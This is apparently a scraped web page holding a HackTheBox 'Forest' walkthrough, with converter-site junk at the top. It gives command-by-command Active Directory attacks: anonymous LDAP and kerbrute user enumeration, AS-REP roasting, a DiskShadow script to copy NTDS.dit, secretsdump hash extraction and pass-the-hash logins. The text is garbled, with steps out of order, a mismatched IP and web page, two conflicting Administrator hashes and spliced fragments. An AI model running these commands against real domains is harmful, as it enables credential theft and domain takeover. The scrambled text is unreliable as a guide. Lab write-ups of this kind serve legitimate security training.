Remove Ads
1
2
Select audio format:
3
Сonversion complete
Conversion of {0} files complete
Files were zipped for ease of downloading
Convert another file

Best | Forest Hackthebox Walkthrough

Visiting http://10.10.10.74 in a web browser reveals a default Apache web server page. No specific information can be gathered from this page.

We can't run diskshadow via WinRM directly? Actually, we can.

Step A: Upload a script Create a file diskshadow.txt locally:

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:

Transfer it to the target (using evil-winrm upload):

upload diskshadow.txt

Step B: Execute DiskShadow

diskshadow /s diskshadow.txt

Now the C: drive is mapped to Z:\.

Step C: Copy NTDS.dit and SYSTEM Hive

robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system system.save

Step D: Download & Extract Hashes From your Kali machine:

impacket-secretsdump -ntds ntds.dit -system system.save LOCAL

Output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Crack the NTLM hash (32693b11...) or pass-the-hash.

Step E: Pass-the-Hash to Admin

evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Navigate to C:\Users\Administrator\Desktop and grab root.txt.

We are logged in as a service account, but we need Administrator access to read the root flag or fully compromise the domain. forest hackthebox walkthrough best

This is the critical vulnerability of Forest. The DC allows anonymous LDAP queries.

ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local"

Result: Hundreds of entries. We need users.

Extract all users:

ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local" | grep -i "sAMAccountName" | awk 'print $2' > users.txt

The users.txt file looks like this:

Guest
DefaultAccount
Administrator
sebastien
lucinda
andrea
santi
...

This is our attack surface.

Use evil-winrm again with the administrator hash: Visiting http://10

evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8

Now list the root directory:

cd C:\Users\Administrator\Desktop
type root.txt

Root flag obtained.

Now we have a list of ~30 potential usernames. Instead of password spraying (noisy), we will perform AS-REP Roasting.

What is it?
If a user has the DONT_REQ_PREAUTH flag set (disabled pre-authentication), we can request an encrypted timestamp (AS-REP) and crack it offline like a hash.

Use enum4linux or impacket-GetADUsers to list domain users.

impacket-GetADUsers -dc-ip 10.10.10.161 htb.local/

Alternatively, use kerbrute to brute usernames from a wordlist: Transfer it to the target (using evil-winrm upload):

kerbrute userenum --dc 10.10.10.161 -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

But for efficiency, we can also use ldapsearch:

ldapsearch -x -H ldap://10.10.10.161 -b "CN=Users,DC=htb,DC=local" | grep sAMAccountName

Users found: svc-alfresco, sebastien, lucinda, andy, mark, santi.